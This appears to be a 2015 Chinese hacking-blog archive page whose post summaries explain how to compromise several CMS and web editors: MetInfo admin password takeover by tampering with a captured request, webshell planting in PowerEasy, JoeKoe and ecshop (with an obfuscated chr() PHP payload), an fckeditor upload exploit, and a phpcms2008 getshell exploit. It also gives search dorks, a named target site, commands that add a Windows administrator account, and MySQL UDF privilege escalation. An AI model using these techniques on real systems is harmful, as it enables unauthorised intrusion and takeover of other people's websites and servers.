2015年9月30日
MetInfo4.0任意用户密码修改(包括管理员)
摘要: 谷歌搜:powered by Metlnfo 4.0 随便找个网站,先注册个会员 然后修改密码的时候进行抓包 useid直接修改成管理员帐号,修改前: 修改后: 提示成功 进入 后台 阅读全文
posted @ 2015-09-30 22:31 小生观察室 阅读(172) 评论(0) 推荐(0)
动易cms拿shell
摘要: PowerEasy SiteWeaver CMS 6.8 ACCESS Build 090918 1st.进入后台、系统设置、 自定义页面管理 、添加自定义分类2st.添加自定义页面、页面名称:test.asp 页面路径:不填 文件名称:test.asp 页面简介:test.asp 页面内容:一句话 阅读全文
posted @ 2015-09-30 21:33 小生观察室 阅读(437) 评论(0) 推荐(0)
读IIS6和IIS7.5的配置文件并写shell
摘要: 日国外站的单子 :反正跑着玩 简单看下 先 在线web扫描 https://www.yascanner.com/之后发现存在注入漏洞 asp的站 穿山甲可以注入,但是发现是mysql的还卡的有点慢上代理, 发现是root权限, url大小写访问 没变化,确定是windows服务器,可以写,自己在C盘 阅读全文
posted @ 2015-09-30 21:23 小生观察室 阅读(56) 评论(0) 推荐(0)
2015年9月28日
乔客(joekoe) CMS 4.0 上传及后台拿shell
摘要: 上传漏洞:看/common/include/web.upload.asp 中的代码 乔客(JoeKoe) CMS 4.0后台拿shell。来到后台—>系统管理—>网站配置—>网站名称—>在网站名称那里写入一句话。 然后通过一句话链接器连接. www.XXX.com/index.asp 即可! 阅读全文
posted @ 2015-09-28 11:40 小生观察室 阅读(264) 评论(0) 推荐(0)
fckeditor <= 2.6.4 任意文件上传漏洞
摘要: fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测 <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); de 阅读全文
posted @ 2015-09-28 10:51 小生观察室 阅读(3636) 评论(0) 推荐(0)
ecshop后台获取shell,通杀最新版本&后台低权限(2011)
摘要: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马. <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60 阅读全文
posted @ 2015-09-28 10:07 小生观察室 阅读(92) 评论(0) 推荐(0)
2015年9月25日
phpcms2008代码执行 批量getshell EXP
摘要: 使用方法: 谷歌批量搜索 关键字:inurl:yp/product.php exp代码: product.php?}} 找取一个网站:www.slsdgc.com.cn/yp/product.php?catid=721 exp利用方法:www.slsdgc.com.cn/yp/product.php 阅读全文
posted @ 2015-09-25 16:34 小生观察室 阅读(95) 评论(0) 推荐(0)
检测锦阳师范学院【ewebeditor编辑器】
该文被密码保护。 阅读全文
posted @ 2015-09-25 16:33 小生观察室 阅读(0) 评论(0) 推荐(0)
1433修复命令
摘要: net user SQLDebugger list /addnet localgroup administrators SQLDebugger /add Error Message:未能找到存储过程 'master..xp_cmdshell'。 修复法:很通用的,其实碰到 其他126 127的都可以 阅读全文
posted @ 2015-09-25 16:22 小生观察室 阅读(1081) 评论(0) 推荐(0)
mysql5.1 udf提权
摘要: 今儿遇见一个站,支持aspx,但是不定全满,找不到SA,逼迫使用udf提权,但是提权过程里面遇见了一些问题可以导出 然后就去执行神马create function cmdshell returns string soname 'c:\windows\udf.dll'可是悲剧就来了请检查SQL语句Cr 阅读全文
posted @ 2015-09-25 16:17 小生观察室 阅读(204) 评论(0) 推荐(0)